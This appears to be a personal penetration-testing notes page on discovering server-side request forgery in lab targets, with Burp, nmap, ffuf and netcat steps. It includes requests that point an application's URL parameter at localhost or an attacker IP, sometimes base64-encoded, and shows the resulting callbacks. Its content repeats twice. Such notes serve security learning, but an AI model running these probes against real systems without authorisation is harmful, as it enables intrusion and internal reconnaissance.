01.DISCOVERY

POINTING WEBAPP TO ITSELF

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1/index.php&date=2024-01-02
   - SSRF can be validated if the URL can be changed to point to another URL;
     if the response reports no error, then there is an SSRF vulnerability
      - changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
        will test whether the web application responds w/o error
      - this method also tests whether the SSRF vulnerability is blind or something else
 Response
  ...
  HTTP 200 OK

VIA NETCAT

root@oco:~$ nc -nlvp 8080

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://{attackerIP:port}&date=2024-01-02
   - SSRF can be validated if the URL can be changed to point to another URL;
     if the response reports no error, then there is an SSRF vulnerability
      - changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
        will test whether the web application responds w/o error
      - this method also tests whether the SSRF vulnerability is blind or something else
 Response
  ...
  HTTP 200 OK

root@oco:~$ ...Netcat connection  
 connect to {attackerIP} from (UNKNOWN) [172.17.0.2] 32928
 GET /index.php HTTP/1.1
 Host: 172.17.0.1:8000
 Accept: */*

METHOD 3

root@oco:~$ sudo nmap -sC -sV -T4 10.129.202.133 -p-
 PORT     STATE SERVICE VERSION
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3001/tcp open  http    PHP cli server 5.5 or later
 |_http-title: Login
 3002/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3003/tcp open  http    PHP cli server 5.5 or later (PHP 7.4.3)

root@oco:~$ sudo nmap --script=vuln -T4 10.129.202.133 -p 3000-3003
 PORT     STATE SERVICE
 3000/tcp open  ppp
 3001/tcp open  nessus
 3002/tcp open  exlm-agent
 3003/tcp open  cgms

root@oco:~$ find / -iname directory-list*
 /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
 
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://{targetSite.tld}:{port}/FUZZ -t 100 -ic
 api                     [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 14ms]
 API                     [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 9ms]

 * -w specifies the wordlist
 * -u specifies the url
 * -t increases the number of threads
 * -ic removes commented lines from the file
    - ignore wordlist comments (default: false)
    
root@oco:~$ curl http://10.129.202.133:3000/api
 {"status":"UP"}
 
 * try this on Kibana
 
#perform API endpoint fuzzing common-api-endpoints-mazen160.txt list
root@oco:~$ find / -iname common-api* 2>/dev/null
 /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt

root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt .
root@oco:~$ ffuf -w common-api-endpoints-mazen160.txt -u 'http://{targetSite:port}/api/FUZZ' -t 100 -ic
 download                [Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 27ms]
 userinfo                [Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 27ms]

root@oco:~$ curl 'http://10.129.156.72:3000/api/userinfo'
 {"success":false,"error":"'id' parameter is not given."}
 
root@oco:~$ ifconfig
 ...
 10.10.14.35

root@oco:~$ nc -nlvp 4444
 listening on [any] 4444 ...

root@oco:~$ curl "http://{targetSite:port}/api/userinfo?id=http://{attackerIP}:{port}"
 {"success":false,"error":"'id' parameter is invalid."}

 * if an error is received, base64 encode the payload

#encode the payload
root@oco:~$ echo -n "http://10.10.14.35:4444" | base64
 aHR0cDovLzEwLjEwLjE0LjM1OjQ0NDQ=

#identify the parameter via ffuf
root@oco:~$ ...

root@oco:~$ curl "http://10.129.156.72:3000/api/userinfo?id=aHR0cDovLzEwLjEwLjE0LjM1OjQ0NDQ="
 ...
 listening on [any] 4444 ...
 connect to [<VPN/TUN Adapter IP>] from (UNKNOWN) [<TARGET IP>] 50542
 GET / HTTP/1.1
 Accept: application/json, text/plain, */*
 User-Agent: axios/0.24.0
 Host: <VPN/TUN Adapter IP>:4444
 Connection: close
 
 * although the connection was closed, it shows that the target is vulnerable to SSRF

PreviousSSRF NextBLIND SSRF

Last updated 25 days ago

POINTING WEBAPP TO ITSELF

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1/index.php&date=2024-01-02
   - SSRF can be validated if the URL can be changed to point to another URL;
     if the response reports no error, then there is an SSRF vulnerability
      - changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
        will test whether the web application responds w/o error
      - this method also tests whether the SSRF vulnerability is blind or something else
 Response
  ...
  HTTP 200 OK

VIA NETCAT

root@oco:~$ nc -nlvp 8080

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://{attackerIP:port}&date=2024-01-02
   - SSRF can be validated if the URL can be changed to point to another URL;
     if the response reports no error, then there is an SSRF vulnerability
      - changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
        will test whether the web application responds w/o error
      - this method also tests whether the SSRF vulnerability is blind or something else
 Response
  ...
  HTTP 200 OK

root@oco:~$ ...Netcat connection  
 connect to {attackerIP} from (UNKNOWN) [172.17.0.2] 32928
 GET /index.php HTTP/1.1
 Host: 172.17.0.1:8000
 Accept: */*

METHOD 3

root@oco:~$ sudo nmap -sC -sV -T4 10.129.202.133 -p-
 PORT     STATE SERVICE VERSION
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3001/tcp open  http    PHP cli server 5.5 or later
 |_http-title: Login
 3002/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3003/tcp open  http    PHP cli server 5.5 or later (PHP 7.4.3)

root@oco:~$ sudo nmap --script=vuln -T4 10.129.202.133 -p 3000-3003
 PORT     STATE SERVICE
 3000/tcp open  ppp
 3001/tcp open  nessus
 3002/tcp open  exlm-agent
 3003/tcp open  cgms

root@oco:~$ find / -iname directory-list*
 /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
 
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://{targetSite.tld}:{port}/FUZZ -t 100 -ic
 api                     [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 14ms]
 API                     [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 9ms]

 * -w specifies the wordlist
 * -u specifies the url
 * -t increases the number of threads
 * -ic removes commented lines from the file
    - ignore wordlist comments (default: false)
    
root@oco:~$ curl http://10.129.202.133:3000/api
 {"status":"UP"}
 
 * try this on Kibana
 
#perform API endpoint fuzzing common-api-endpoints-mazen160.txt list
root@oco:~$ find / -iname common-api* 2>/dev/null
 /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt

root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt .
root@oco:~$ ffuf -w common-api-endpoints-mazen160.txt -u 'http://{targetSite:port}/api/FUZZ' -t 100 -ic
 download                [Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 27ms]
 userinfo                [Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 27ms]

root@oco:~$ curl 'http://10.129.156.72:3000/api/userinfo'
 {"success":false,"error":"'id' parameter is not given."}
 
root@oco:~$ ifconfig
 ...
 10.10.14.35

root@oco:~$ nc -nlvp 4444
 listening on [any] 4444 ...

root@oco:~$ curl "http://{targetSite:port}/api/userinfo?id=http://{attackerIP}:{port}"
 {"success":false,"error":"'id' parameter is invalid."}

 * if an error is received, base64 encode the payload

#encode the payload
root@oco:~$ echo -n "http://10.10.14.35:4444" | base64
 aHR0cDovLzEwLjEwLjE0LjM1OjQ0NDQ=

#identify the parameter via ffuf
root@oco:~$ ...

root@oco:~$ curl "http://10.129.156.72:3000/api/userinfo?id=aHR0cDovLzEwLjEwLjE0LjM1OjQ0NDQ="
 ...
 listening on [any] 4444 ...
 connect to [<VPN/TUN Adapter IP>] from (UNKNOWN) [<TARGET IP>] 50542
 GET / HTTP/1.1
 Accept: application/json, text/plain, */*
 User-Agent: axios/0.24.0
 Host: <VPN/TUN Adapter IP>:4444
 Connection: close
 
 * although the connection was closed, it shows that the target is vulnerable to SSRF